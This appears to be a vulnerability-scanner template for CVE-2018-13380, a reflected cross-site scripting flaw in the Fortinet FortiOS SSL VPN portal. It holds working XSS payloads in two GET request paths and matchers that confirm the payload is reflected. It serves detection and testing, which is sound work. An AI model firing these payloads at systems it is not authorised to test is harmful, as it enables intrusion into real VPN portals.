id: CVE-2018-13380

info:
  name: Fortinet FortiOS Cross-Site Scripting
  author: shelld3v
  severity: medium
  description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
  tags: cve,cve2018,fortios,xss
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2018-13380
    cwe-id: CWE-79

requests:
  - method: GET
    path:
      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
      - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<svg/onload=alert(1337)>"
        part: body

      - type: word
        words:
          - "application/json"
        part: header
        negative: true

      - type: status
        status:
          - 200